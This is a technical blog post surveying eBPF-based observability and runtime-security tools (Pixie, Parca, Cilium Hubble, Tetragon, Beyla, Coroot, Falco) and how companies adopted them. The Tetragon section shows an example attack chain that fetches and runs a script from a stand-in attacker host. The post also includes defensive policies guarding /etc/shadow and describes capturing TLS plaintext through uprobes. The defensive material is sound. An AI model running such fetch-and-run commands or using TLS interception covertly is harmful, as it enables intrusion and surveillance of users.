필사 모드: eBPF Observability 2026 — Pixie / Parca / Cilium Hubble / Tetragon / Beyla / Coroot / Falco Deep Dive
English2026: The Year eBPF Became Infrastructure's Standard Nervous System
Five years ago, eBPF was treated as "a curious toy for Linux kernel hackers." In 2026, eBPF is the de-facto standard in:
- **Networking** — Cilium is the default CNI option on GKE, EKS, and AKS, and it is replacing kube-proxy
- **Observability** — Pixie, Parca, Beyla, and Coroot made "auto-instrumentation without code changes" real
- **Security** — Tetragon and Falco are the de-facto standards for runtime security
- **Scheduling** — sched_ext (CONFIG_SCHED_CLASS_EXT) landed in the Linux mainline at 6.12; Meta and Google run custom schedulers in production
- **Power** — Kepler entered CNCF Incubating and became the de-facto standard for measuring data-center carbon footprint
This post walks the 2026 eBPF landscape top to bottom: what each tool does, why it works that way, and how Korean and Japanese big-tech adopted it.
1. eBPF in 2026 — The Four Domains Where It Won
Let us draw the big picture first. eBPF is solidifying as the standard in four areas simultaneously.
┌──────────────────────────────────────────────────────────────────────────┐
│ eBPF — De-Facto Standards by Domain (2026) │
├──────────────────────────────────────────────────────────────────────────┤
│ Network / CNI │ Cilium (CNCF Graduated 2023) │
│ - Network observ. │ Hubble (sister project) │
│ - kube-proxy repl. │ Cilium kube-proxy replacement │
│ - Service mesh │ Cilium Service Mesh (sidecarless Envoy) │
├──────────────────────────────────────────────────────────────────────────┤
│ Observ. (tracing) │ Pixie (CNCF Sandbox, New Relic-backed / OSS) │
│ Observ. (profiling) │ Parca / Grafana Pyroscope │
│ Observ. (auto-instr.) │ Grafana Beyla / OpenTelemetry eBPF Collector │
│ Observ. (auto-infer) │ Coroot │
│ k8s diagnostics │ Inspektor Gadget (Microsoft, CNCF Sandbox) │
├──────────────────────────────────────────────────────────────────────────┤
│ Security (runtime) │ Falco (CNCF Graduated 2024) / Tetragon (Isovalent) │
│ - Policy signals │ Cilium Tetragon │
│ - Syscall auditing │ Falco │
├──────────────────────────────────────────────────────────────────────────┤
│ Power / Sustainability│ Kepler (CNCF Incubating) │
│ Scheduling │ sched_ext (Linux 6.12+, Meta scx schedulers) │
└──────────────────────────────────────────────────────────────────────────┘
The interesting thing is that all four domains rest on a single technology: "running verified code safely inside the kernel." How that is possible is the next chapter.
2. eBPF Fundamentals — Why You Can "Safely" Extend the Kernel
eBPF stands for extended Berkeley Packet Filter, but its name is far narrower than what it actually is. The essence is "a virtual machine that lets user-space load small programs that the kernel runs, verified, in kernel context."
Traditional kernel-extension options
1. **Kernel modules (`.ko`)** — Powerful but dangerous; a bad module panics the kernel
2. **kprobes / uprobes / tracepoints** — Safe but data collection is limited
3. **systemtap** — Looks like a scripting language, but ultimately compiles to a kernel module
The eBPF approach
User space Kernel space
────────── ────────────
[C source] [eBPF VM]
│ ▲
▼ │
[Clang/LLVM] ──▶ [eBPF bytecode] ──▶ [Verifier]
│
▼
[JIT compiler]
│
▼
[native code]
│
▼
[hook: kprobe, tracepoint, XDP, sched ...]
The heart is the **verifier**. Before loading, every eBPF program is checked for:
- **No infinite loops** — All backward jumps must have an explicit bound (bounded loops, Linux 5.3+)
- **Only valid memory access** — Pointer tracking, range checks
- **Guaranteed termination** — Per-program instruction cap (1M instructions, Linux 5.2+)
- **Only helper functions** — You cannot call arbitrary kernel functions; only whitelisted helpers
Thanks to the verifier, users can write "code that runs in the kernel yet cannot brick the kernel." This is the magic of eBPF.
Lifecycle of an eBPF program
// Hello eBPF (libbpf style)
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
SEC("tracepoint/syscalls/sys_enter_openat")
int trace_openat(void *ctx) {
char msg[] = "openat called\n";
bpf_trace_printk(msg, sizeof(msg));
return 0;
}
char LICENSE[] SEC("license") = "GPL";
Compile
clang -O2 -target bpf -c hello.c -o hello.o
Load (with bpftool)
sudo bpftool prog load hello.o /sys/fs/bpf/hello
sudo bpftool prog attach pinned /sys/fs/bpf/hello tracepoint syscalls sys_enter_openat
Read the trace
sudo cat /sys/kernel/debug/tracing/trace_pipe
This tiny example shows the magic: every time openat is called, the kernel runs our verified code. We can track which files any process opens.
3. The CO-RE Revolution — Compile Once, Run Everywhere
The biggest problem with early eBPF was **kernel-version compatibility**. Internal kernel structs differ between versions. For example, some `task_struct` field sits at offset 200 on 5.4, 224 on 5.10, and 248 on 6.5.
So old-school BCC took the approach of "compile at runtime with Clang against the kernel headers." Downsides:
- Every node needs Clang + kernel headers installed (hundreds of MB)
- Startup takes seconds to tens of seconds
- Running a compiler in production gives ops nightmares
How CO-RE works
CO-RE solves this with BTF (BPF Type Format) and libbpf's relocation feature.
At compile time:
eBPF.c ── Clang/LLVM ──▶ BPF bytecode + BTF info (struct-field reference metadata)
At runtime:
Compare against the running kernel's BTF (/sys/kernel/btf/vmlinux)
──▶ libbpf recomputes offsets
──▶ Patches the memory-access instructions in the bytecode
──▶ Passes the verifier and loads
The key macro is `BPF_CORE_READ()`. Old style:
// BCC style (runtime compilation)
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
pid_t ppid;
bpf_probe_read(&ppid, sizeof(ppid), &task->real_parent->tgid);
Modern style:
// CO-RE style (compile once, run anywhere)
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
pid_t ppid = BPF_CORE_READ(task, real_parent, tgid);
The impact of this small change is enormous. **Container image sizes dropped from 100 MB to 5 MB**, and startup is now instantaneous. Every modern eBPF tool — Cilium, Pixie, Tetragon, Inspektor Gadget — is built on CO-RE.
BTF required, headers not
As of 2026, Ubuntu 22.04+, RHEL 9+, Amazon Linux 2023+, and Bottlerocket all ship with BTF by default (`/sys/kernel/btf/vmlinux`). For older kernels, BTFHub (https://github.com/aquasecurity/btfhub) provides external BTF.
4. Pixie — The Definitive Kubernetes Auto-Instrumentation Tool
Pixie is the Kubernetes observability platform that New Relic acquired and open-sourced (Apache 2.0). It is a CNCF Sandbox project and was rumored as an Incubating candidate going into 2026.
What Pixie solves
Traditional APM forces one of these on you:
1. Install an agent on every service (Datadog, New Relic APM)
2. Embed an OpenTelemetry SDK in every service via code
3. Deploy a service-mesh sidecar (Istio, Linkerd)
All three require **code or deployment changes**. Pixie's promise is different. **"Install in your cluster with one YAML, and every flow is visible immediately."**
Architecture
┌──────────────────────────────┐
│ Pixie UI / Pixie CLI │
│ PxL query language (Python-ish) │
└──────────────┬───────────────┘
│ gRPC
┌───────────────▼─────────────────┐
│ Pixie Cloud (optional, self-hostable) │
│ or Pixie Vizier (in-cluster) │
└───────────────┬─────────────────┘
│
┌────────────────────────────┼────────────────────────────┐
▼ ▼ ▼
┌───────┐ ┌───────┐ ┌───────┐
│ PEM │ │ PEM │ │ PEM │
│ (node)│ │ (node)│ │ (node)│
└─┬─────┘ └─┬─────┘ └─┬─────┘
│ eBPF │ eBPF │ eBPF
▼ ▼ ▼
[kernel traces] [kernel traces] [kernel traces]
PEM = Pixie Edge Module (DaemonSet)
Data is held in node memory for 24 hours only (long-term storage via Iceberg/S3 export)
A PEM runs per node and captures the following automatically:
- HTTP/HTTP2/gRPC requests and responses (headers + body)
- MySQL, PostgreSQL, Redis, Kafka, MongoDB queries
- DNS queries
- TCP/UDP connections, retransmits, RTT
- CPU profiles (perf_event)
TLS is visible
The most impressive bit. **HTTPS traffic is visible.** How? Pixie attaches uprobes to OpenSSL's `SSL_read` / `SSL_write` and observes the plaintext right before encryption and right after decryption.
// Simplified pseudo-code
SEC("uprobe/SSL_write")
int trace_ssl_write(struct pt_regs *ctx) {
void *buf = (void *)PT_REGS_PARM2(ctx);
size_t len = (size_t)PT_REGS_PARM3(ctx);
// Send the first N bytes of buf into a perf buffer
...
}
Go binaries are statically linked, which is trickier. Pixie locates Go's TLS-library symbols (`crypto/tls.(*Conn).Read/Write`) and hooks uprobes on them.
PxL query example
Top 10 slowest HTTP endpoints in the last 5 minutes
df = px.DataFrame(table='http_events', start_time='-5m')
df = df[df.resp_status >= 200]
df.endpoint = df.req_path
df = df.groupby('endpoint').agg(
p50=('latency', px.quantiles(0.50)),
p99=('latency', px.quantiles(0.99)),
count=('latency', px.count),
)
df = df.sort('p99', desc=True).head(10)
px.display(df)
PxL is a Python-flavored DSL, but is actually compiled and executed by a C++ backend. All queries hit the in-memory data on each PEM, so they are fast.
Limits
- **No long-term storage** — Default 24 hours. To keep data longer, export Pixie to OpenTelemetry and ship to another backend (Honeycomb, Tempo, Iceberg)
- **Resource usage** — A PEM typically consumes 1–2 GB of memory per node, which can be heavy on small nodes
- **HTTPS relies on uprobe matching** — Static OpenSSL linking or unusual TLS libraries make capture tricky
Still, Pixie is the definitive showcase of "what eBPF auto-instrumentation can do."
5. Parca — Continuous Profiling
Parca is the open-source continuous-profiling tool from Polar Signals (the company founded by Frederic Branczyk). It is CNCF Sandbox as of 2026.
What "continuous profiling" means
Traditional profiling was reactive: "Something is wrong, so let me run perf record now and analyze." Continuous profiling is **always-on, low-overhead (typically 1%) profiling of every process, stored for later**. Then post-hoc analysis like "memory spiked last Tuesday at 3 PM" becomes possible.
What sets Parca apart
Alternatives:
- perf record → manual, data is huge
- py-spy / pyroscope → per-language agent
- Datadog Continuous Profiler → paid, proprietary
Parca's take:
- parca-agent: a single DaemonSet per node
- eBPF-based 99 Hz stack sampling via perf_event
- One agent for Go, Rust, C/C++, Python, Java, Node.js
- DWARF-based stack unwinding (no libunwind, all in the kernel)
- pprof-compatible format (Parca Server)
The pain of per-node stack sampling
Sampling stacks at 99 Hz means capturing the call stack of the running function 99 times per second on every CPU. The canonical way is to walk the stack pointer (rbp register), but modern compilers omit frame pointers for optimization (`-fomit-frame-pointer`).
Two ways out:
1. **Re-enable frame pointers** — Fedora 38+ and Ubuntu 24.04+ now ship their entire library set with frame pointers enabled (a genuinely big shift)
2. **DWARF-based unwinding** — Read the DWARF eh_frame section to derive the rules for translating the stack pointer. Parca does this **inside eBPF**
Parca pre-loads DWARF unwind info into BPF maps and uses it at sampling time to reconstruct call stacks. This technique was developed by Polar Signals together with the Linux community, and today the Grafana Pyroscope and Datadog profilers all take the same approach.
Flame graphs
The collected stack data is rendered as a flame graph — the visualization Brendan Gregg invented.
┌──────────────────────────────────────┐
│ main (100%) │
├────────────┬─────────────────────────┤
│ http (80%) │ db.query (15%) │
├─────┬──────┼────────┬────────────────┤
│a(40)│b(40) │parse(5)│ exec(10) │
└─────┴──────┴────────┴────────────────┘
Horizontal width = CPU-time share
Up = call depth
Parca vs Pyroscope vs Datadog
| Tool | Open source | Single agent, many langs | DWARF unwinding | Backend |
|------|-------------|--------------------------|-----------------|---------|
| Parca | Apache 2.0 | Yes | Yes | Parca Server (Go) |
| Grafana Pyroscope | AGPL | Partial (separate eBPF agent) | Yes | Pyroscope Server |
| Datadog | Closed | Yes | Yes | SaaS |
| pprof + go pprof | Standard | No | Compiler-dependent | File |
The 2026 trend is convergence on Grafana Pyroscope + Parca-compatible format. pprof has effectively become the standard interchange format.
6. Cilium Hubble — Kubernetes Network Observability
Cilium became CNCF Graduated in 2023, and as of 2026 it is the default option for GKE Dataplane v2, EKS Anywhere, and AKS Advanced. Hubble is Cilium's sister project, observing network flows.
Limits of kube-proxy
The classic kube-proxy uses iptables or IPVS rules for ClusterIP routing. Problems:
- As the service count grows, iptables rules balloon into tens of thousands — O(n) matching per packet (IPVS is hashed but has conntrack overhead)
- No L7 routing
- Poor policy visibility (no way to see why a packet was dropped)
Cilium's approach
TC ingress hook ──▶ eBPF program ──▶ routing / policy / logging
├─▶ DROP / FORWARD / REDIRECT
└─▶ emit event to Hubble
kube-proxy replacement: service mappings live in BPF maps, O(1) lookup per packet
Network policy: L3–L7 evaluated entirely in BPF
Service mesh: Envoy runs sidecarless (per-node)
Hubble UI
Hubble collects the flow events Cilium emits and presents:
- Real-time service-dependency graph
- L7 metrics (HTTP status distribution, method distribution)
- DNS query flows
- Policy violations (with DENY reason included)
Live flow tail
hubble observe --namespace prod --follow
Mar 15 10:23:01.234 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 SYN
Mar 15 10:23:01.235 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 ACK
Mar 15 10:23:01.240 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 HTTP/1.1 GET /v1/users/me (200, 5ms)
L7 stats
hubble observe --http-status 500 --since 5m --output table
Cilium Network Policy example
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
name: api-only-from-frontend
spec:
endpointSelector:
matchLabels:
app: api
ingress:
- fromEndpoints:
- matchLabels:
app: frontend
toPorts:
- ports:
- port: '8080'
protocol: TCP
rules:
http:
- method: GET
path: '/v1/.*'
- method: POST
path: '/v1/orders'
This policy enforces all the way down to L7 (HTTP method + path). The classic NetworkPolicy cannot do that.
Hubble Timescape
Added in 2025: Hubble flow data is persisted to Iceberg for long-term retention, enabling "what did our traffic patterns look like last week?" analysis. Critical for post-incident forensics.
7. Tetragon — Isovalent's Security Observability
Tetragon is the security-observability / runtime-security tool from Isovalent (now Cisco), the creators of Cilium. Entered CNCF Incubating in 2024.
How it differs from Falco
Falco hooks system calls and evaluates rules. Tetragon is similar but differs as follows:
| Aspect | Falco | Tetragon |
|--------|-------|----------|
| Hook approach | libbpf modern eBPF + kernel module (legacy) | Pure eBPF, CO-RE based |
| Policy language | YAML rules (Sysdig-compatible) | TracingPolicy (CRD) |
| Real-time enforcement | Partial (BPF helper) | Strong (sigkill, override) |
| Process context | Rich | Rich + parent / grandparent / exec ancestry |
| k8s integration | Good | Very strong (auto-attaches Pod metadata) |
What real-time enforcement means
Tetragon can issue SIGKILL to a violating process via the BPF helper `bpf_send_signal()`. Meaning: this is not "detect then notify" — it is "detect and block in the same breath."
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: block-sensitive-file-access
spec:
kprobes:
- call: 'security_file_open'
syscall: false
args:
- index: 0
type: 'file'
selectors:
- matchArgs:
- index: 0
operator: 'Prefix'
values:
- '/etc/shadow'
- '/etc/passwd'
matchActions:
- action: 'Sigkill'
Once this policy is in place, the instant any process tries to open `/etc/shadow`, SIGKILL fires from inside the kernel. There is no user-space agent waking up to make a decision. This works because verified code runs directly inside the kernel.
Process ancestry
Another Tetragon highlight: every event can trace "how this process came to exist."
process sshd (pid 1234, uid 0)
└─ bash (pid 1235, uid 0)
└─ wget http://attacker.com/x.sh (pid 1240, uid 0)
└─ sh x.sh (pid 1241, uid 0)
└─ /tmp/x (pid 1245, uid 0) <- violation
The ancestry is built by walking `task_struct->real_parent` in eBPF. In incident analysis, you can immediately see "where this small violation actually started."
8. BCC + bpftrace — The Classics for Ad-Hoc Tracing
If the tools above are "production daemons," BCC and bpftrace are the "engineer SSHes in and runs them directly" tools. They became standard after Brendan Gregg's book "BPF Performance Tools" (2019).
BCC vs bpftrace
- **BCC**: A larger framework with Python or C++ wrappers. Lots of complex tools (`opensnoop`, `execsnoop`, `biolatency`, `tcplife`, ... 200+ tools)
- **bpftrace**: An awk-style one-line DSL. Lets you trace on the spot
bpftrace one-liner magic
1) Which process opens which file (3 seconds)
sudo bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s opens %s\n", comm, str(args->filename)); }' -c 'sleep 3'
2) Disk-I/O latency histogram
sudo bpftrace -e '
kprobe:vfs_read { @start[tid] = nsecs; }
kretprobe:vfs_read /@start[tid]/ {
@ns = hist(nsecs - @start[tid]);
delete(@start[tid]);
}
'
3) Which functions are called most (10 seconds)
sudo bpftrace -e 'profile:hz:99 { @[kstack(3)] = count(); }' -c 'sleep 10' | head -20
4) Where TCP retransmits are going
sudo bpftrace -e '
kprobe:tcp_retransmit_skb {
$sk = (struct sock *)arg0;
printf("retransmit %s\n", ntop($sk->__sk_common.skc_daddr));
}
'
BCC's standard toolset
After installing `bcc-tools` (Ubuntu/Debian) or `bpftrace` (CO-RE build), you can use these from `/usr/sbin/` or `/usr/share/bcc/tools/`:
Which processes are starting
sudo execsnoop-bpfcc
Which files are being opened
sudo opensnoop-bpfcc
TCP connection lifetimes
sudo tcplife-bpfcc
Block-I/O latency histogram
sudo biolatency-bpfcc
Top CPU consumers
sudo profile-bpfcc 10
Why these tools matter
Pixie, Parca, and Hubble above are "always-on" tools. BCC/bpftrace are the "give me an answer right now during this incident" tools. You need both.
Brendan Gregg's "Systems Performance" (2nd ed., 2020) and "BPF Performance Tools" (2019) are the canonical references for this space.
9. OpenTelemetry eBPF Collector + Grafana Beyla — Standardizing Auto-Instrumentation
OpenTelemetry is the CNCF observability standard. In 2025, eBPF-based auto-instrumentation solidified along two paths.
OpenTelemetry eBPF Collector
opentelemetry-ebpf is an official OpenTelemetry component, driven primarily by Splunk. It auto-collects:
- Network-flow metrics (kprobe based)
- DNS, TCP, UDP stats
- Pod/Service/Workload labeling (k8s integration)
It exports OTLP, so any backend (Tempo, Jaeger, Honeycomb, Datadog) can consume it.
Grafana Beyla
Beyla is Grafana Labs' Go-based eBPF auto-instrumentation agent. GA in 2024. Features:
- Auto-recognizes HTTP, gRPC, SQL, Redis traffic via uprobes
- Captures plaintext from TLS traffic by hooking OpenSSL/Go TLS functions
- Extracts distributed-trace context (W3C traceparent)
- Exports to OTLP, Prometheus, Mimir
Plain run (pick the process to follow via BEYLA_EXECUTABLE_NAME)
BEYLA_EXECUTABLE_NAME=myapp \
BEYLA_PROMETHEUS_PORT=9090 \
BEYLA_OPEN_PORT=8080 \
sudo beyla
DaemonSet in k8s
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: beyla
spec:
template:
spec:
hostPID: true # to see processes outside this container
containers:
- name: beyla
image: grafana/beyla:latest
securityContext:
privileged: true # simplification; really only CAP_SYS_ADMIN + CAP_BPF needed
env:
- name: BEYLA_DISCOVERY_SERVICES
value: 'k8s:.*' # auto-discover every k8s service
- name: BEYLA_OTEL_ENDPOINT
value: 'http://otel-collector:4318'
Beyla vs Pixie
| Aspect | Beyla | Pixie |
|--------|-------|-------|
| Backed by | Grafana Labs | New Relic |
| License | Apache 2.0 | Apache 2.0 |
| Data model | OTLP (standard) | PxL queries (custom) |
| Backend | Tempo, Jaeger, any OTLP backend | Pixie Vizier + export |
| Strength | OTel-ecosystem integration | In-memory queries, rich UI |
The 2026 direction is clear. **Auto-instrumentation is, in practice, all converging on OpenTelemetry**, and Beyla / Pixie / Coroot are paving that road.
10. Coroot — Auto-Inferred Observability
Coroot is a relatively new project that surfaced in 2023, but its "auto-inferred" observability approach has rapidly caught on. Open source (Apache 2.0).
What "auto-inferred" means
Traditional observability forces a human to define:
- Which metrics constitute an SLO
- Which services depend on which other services
- What the alerting thresholds are
- Which log patterns are errors
Coroot's promise: **"observe all of that with eBPF and infer the rest automatically."**
What Coroot infers automatically:
1. Service-dependency graph (from network flows)
2. SLO candidates (from HTTP/gRPC traffic analysis)
3. Database query grouping (auto-normalized, auto-classified)
4. Alert candidates (based on anomaly detection)
5. Cost / resource-efficiency analysis
Architecture
Coroot also runs per-node agents (coroot-node-agent). Those agents capture via eBPF:
- TCP connections, RTT, retransmits
- HTTP/HTTPS (TLS captured with uprobes)
- DB protocols (PostgreSQL, MySQL, Redis, MongoDB)
- File I/O, CPU use
The collected data is stored by Coroot Server (Go) on Prometheus and ClickHouse backends.
What you see
Open Coroot's UI and you immediately see things like:
- A "frontend -> api -> postgres -> s3" dependency graph
- Per-edge RPS, p99 latency, error rate
- "Among queries hitting postgres, SELECT * FROM users WHERE ... is the slowest at p99 200 ms"
- "Frontend node ip-10-0-1-23 is 30% higher CPU than baseline"
All automatic. Nobody built those dashboards. Especially useful for small teams.
Limits
Coroot trades "standard" for "convenience." Its backend is Prometheus + ClickHouse, which is good for data portability, but its data model is custom — so organizations already invested in Datadog or Honeycomb face additional learning.
11. Inspektor Gadget / Kepler / Falco — A Small but Important Trio
Inspektor Gadget (Microsoft, CNCF Sandbox)
Inspektor Gadget is a "collection of eBPF-built k8s debugging tools" sponsored by Microsoft. It runs as a kubectl plugin.
kubectl gadget trace exec # track new processes across the whole cluster
kubectl gadget trace open # which files are being opened
kubectl gadget trace dns # DNS query flows
kubectl gadget snapshot socket # snapshot open sockets on every node
kubectl gadget top file # top file-I/O users
Internally it began as a wrapper around BCC tools and has evolved into its own IG (Inspektor Gadget) framework, CO-RE based.
Kepler (Sustainable Computing)
Kepler (Kubernetes Efficient Power Level Exporter) started in CNCF Sandbox and was promoted to Incubating in 2025. It measures per-container power usage.
The method is clever. It uses CPU counters (RAPL: Running Average Power Limit), disk I/O, and network I/O, attributes them to containers via eBPF, and then a machine-learning model estimates power in watts.
Exposed as Prometheus metrics
kepler_container_joules_total{container_name="myapp"} 12345.6
kepler_container_other_joules_total{...}
These metrics feed Cloud Carbon Footprint calculators that translate to "how many kg of CO2 did this service produce this month." Directly tied to ESG reporting and FinOps.
Falco (CNCF Graduated)
Falco became CNCF Graduated in 2024. The essence is "a runtime-security engine that hooks system calls and evaluates rules."
Excerpt of falco_rules.yaml
- rule: Write below etc
desc: an attempt to write to any file below /etc
condition: write_etc_common
output: 'File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name parent=%proc.pname)'
priority: ERROR
tags: [filesystem, mitre_persistence]
Falco's default driver is now modern eBPF probe (libbpf-based); the legacy kernel-module driver is deprecated. The "Falco Rules" official repository ships 600+ rules covering most MITRE ATT&CK categories.
Tetragon and Falco are competitors but are often deployed together. Falco has the rich rule library, Tetragon has the strong real-time enforcement.
12. eBPF for Windows / macOS — Beyond Linux
eBPF is no longer a Linux-only technology.
eBPF for Windows (Microsoft)
Microsoft kicked off the eBPF-for-Windows project in 2021. As of 2026, a stable version ships in Windows Server 2025 and Azure has started production use.
Linux-compatible:
- libbpf-compatible API
- The same .o file (mostly) loads on both
- Core types: BPF_PROG_TYPE_XDP, BPF_PROG_TYPE_BIND, BPF_PROG_TYPE_CGROUP_SOCK, ...
Differences:
- Verifier is PREVAIL (a separate Microsoft implementation, academically verified)
- JIT is based on Microsoft uBPF
- Hook points center on NDIS (the network driver stack)
Azure's security team runs Tetragon-style hooks on Windows VMs, and Cilium's Windows-node support is in progress. Not yet a game-changer, but the perception of "eBPF is Linux-only" is fading fast.
macOS and Apple Silicon
Apple does not officially support eBPF. macOS has kqueue, DTrace, and the Endpoint Security API filling similar roles. That said, since 2025 it has become commonplace to run eBPF tools inside Linux VMs on Apple Silicon (Lima, Tart, OrbStack), and Asahi Linux has solid ARM eBPF support.
There are experimental unofficial ports (mac-bpf, ebpf-darwin), but no production use to speak of. On macOS, the right answer is running eBPF inside a Linux VM.
13. Korean / Japanese Adoption — Toss, Kakao, LINE, Mercari
Toss — Cilium + Hubble + Tetragon as a Company Standard
Toss announced at SLASH 2024 (their developer conference) that their infrastructure is EKS + Cilium based. The main driver was iptables-rule explosion in kube-proxy. After adopting Cilium:
- iptables rules per node dropped from 10,000+ to nearly zero
- Service-discovery latency p99 dropped meaningfully
- Hubble visualized microservice dependencies
- Tetragon does runtime blocking in some security-sensitive domains
The SLASH 2024 talk is publicly available on YouTube.
Kakao — eBPF-Based In-House Tracing
Kakao presented an in-house eBPF-based tracing system at ifkakao 2024. The core is BCC plus a custom collector that auto-captures RPC calls and database queries. They evaluated Pixie but chose to build it in-house.
LINE / LY Corporation
LINE has shared eBPF use cases multiple times on the LINE Engineering blog. They lean on bpftrace heavily for analyzing TCP retransmits in messenger traffic and network-debugging Kafka clusters.
Mercari — Continuous Profiling
Mercari shared on the Mercari Engineering blog in 2024 how they put Grafana Pyroscope (Parca-compatible) into production. They found CPU hotspots across 100+ Go microservices and cut EC2 costs as a result.
Yahoo Japan / LY Corporation
Yahoo! JAPAN has been operating eBPF-based network observability since 2023. A custom collector captures every TCP flow on every node and stores it in ClickHouse.
14. An Adoption Decision Guide — What to Use When
Finally, the practical decision guide. Do not "adopt everything at once" — go stage by stage.
Stage 1 — Do you need network visibility?
Start with **Cilium + Hubble**. Swapping the CNI is the biggest short-term change, but the biggest long-term payoff. If this is a new cluster, just go Cilium.
Stage 2 — You have no APM, or it is too expensive
Install **Beyla** (OTel-friendly) or **Pixie** (in-memory queries) on one cluster. Within a month you will see "which services are slow."
Stage 3 — You need profiling data
Install **Parca** or **Grafana Pyroscope**. For Go / Rust / Java workloads, CPU hotspots become instantly visible. Especially effective on AI infrastructure where CPU and memory are expensive.
Stage 4 — You need runtime security
Start with **Falco** — rich ruleset, easy install. If you genuinely need real-time blocking, add **Tetragon**.
Stage 5 — You debug k8s often
Install **Inspektor Gadget** as a kubectl plugin. `kubectl gadget trace exec` and friends become daily workflow.
Stage 6 — You need resource / power monitoring
**Kepler** for power. **Coroot** for an auto-inferred dashboard.
Stage 7 — Troubleshooting tools
**BCC + bpftrace** should always be installed for on-the-spot debugging over SSH.
Anti-patterns
- **Install every tool** — Resource overhead stacks up; ops burden grows. Add 100–500 MB per node memory per tool
- **Old kernels without CO-RE** — Linux below 5.4 means upgrading is priority #1
- **Kernels without BTF** — If `/sys/kernel/btf/vmlinux` is missing, you depend on BTFHub
- **Reckless privileged DaemonSets** — Grant CAP_BPF, CAP_PERFMON, CAP_NET_ADMIN explicitly, avoid root
- **Turning on auto-blocking too quickly** — A misconfigured Tetragon Sigkill action will kill perfectly healthy processes. Run in alert mode first, validate patterns, then switch to block mode
Closing — Why eBPF Became the Default Infrastructure Tool
eBPF's explosive growth has clear reasons:
1. **CO-RE made ops easy** — No kernel headers, no compilers required
2. **Safety** — The isolation the verifier guarantees is something kernel modules never could
3. **Performance** — Hook cost is typically under 100 ns, so you can leave it on in production
4. **Standardization** — OpenTelemetry converged the data model, CNCF validates the tools
5. **Polyglot** — A single agent observes Go, Rust, C++, Python, and Java
An infrastructure engineer in 2026 not knowing eBPF is like an infrastructure engineer in 2016 not knowing Docker. Start by reading one book (Liz Rice's "Learning eBPF" or Brendan Gregg's "BPF Performance Tools"), then drop Cilium + Hubble + Beyla onto one cluster.
> "We instrumented production with eBPF and discovered three latency issues that had been there for two years. We never had to add a single log line." — Lyft Engineering, 2024
References
- [eBPF official site](https://ebpf.io/)
- [eBPF Foundation](https://ebpf.foundation/)
- [Linux Kernel BPF docs](https://docs.kernel.org/bpf/)
- [libbpf on GitHub](https://github.com/libbpf/libbpf)
- [bpftool on GitHub](https://github.com/libbpf/bpftool)
- [CO-RE guide — Andrii Nakryiko's blog](https://nakryiko.com/posts/bpf-portability-and-co-re/)
- [Liz Rice — Learning eBPF (O'Reilly, 2023)](https://www.oreilly.com/library/view/learning-ebpf/9781098135119/)
- [Brendan Gregg — BPF Performance Tools (Addison-Wesley, 2019)](https://www.brendangregg.com/bpf-performance-tools-book.html)
- [Brendan Gregg — Systems Performance, 2nd ed.](https://www.brendangregg.com/systems-performance-2nd-edition-book.html)
- [Pixie](https://px.dev/)
- [Pixie on GitHub](https://github.com/pixie-io/pixie)
- [Parca](https://www.parca.dev/)
- [Polar Signals blog](https://www.polarsignals.com/blog)
- [Cilium](https://cilium.io/)
- [Hubble on GitHub](https://github.com/cilium/hubble)
- [Tetragon](https://tetragon.io/)
- [Tetragon on GitHub](https://github.com/cilium/tetragon)
- [BCC on GitHub](https://github.com/iovisor/bcc)
- [bpftrace on GitHub](https://github.com/bpftrace/bpftrace)
- [OpenTelemetry eBPF on GitHub](https://github.com/open-telemetry/opentelemetry-ebpf)
- [Grafana Beyla](https://grafana.com/oss/beyla-ebpf/)
- [Grafana Beyla on GitHub](https://github.com/grafana/beyla)
- [Grafana Pyroscope](https://grafana.com/oss/pyroscope/)
- [Coroot](https://coroot.com/)
- [Coroot on GitHub](https://github.com/coroot/coroot)
- [Inspektor Gadget](https://www.inspektor-gadget.io/)
- [Kepler](https://sustainable-computing.io/)
- [Kepler on GitHub](https://github.com/sustainable-computing-io/kepler)
- [Falco](https://falco.org/)
- [Falco on GitHub](https://github.com/falcosecurity/falco)
- [eBPF for Windows on GitHub](https://github.com/microsoft/ebpf-for-windows)
- [Asahi Linux](https://asahilinux.org/)
- [sched_ext](https://sched-ext.com/)
- [BTFHub — BTF for old kernels](https://github.com/aquasecurity/btfhub)
- [Toss SLASH 24 — Cilium adoption talk](https://toss.tech/slash-24)
- [LINE Engineering blog](https://engineering.linecorp.com/en)
- [Mercari Engineering blog](https://engineering.mercari.com/en/)
- [eBPF Summit](https://ebpf.io/summit-2024/)
- [CNCF Landscape — Observability and Analysis](https://landscape.cncf.io/)
- [Isovalent (Cisco) blog](https://isovalent.com/blog/)
현재 단락 (1/464)
Five years ago, eBPF was treated as "a curious toy for Linux kernel hackers." In 2026, eBPF is the d...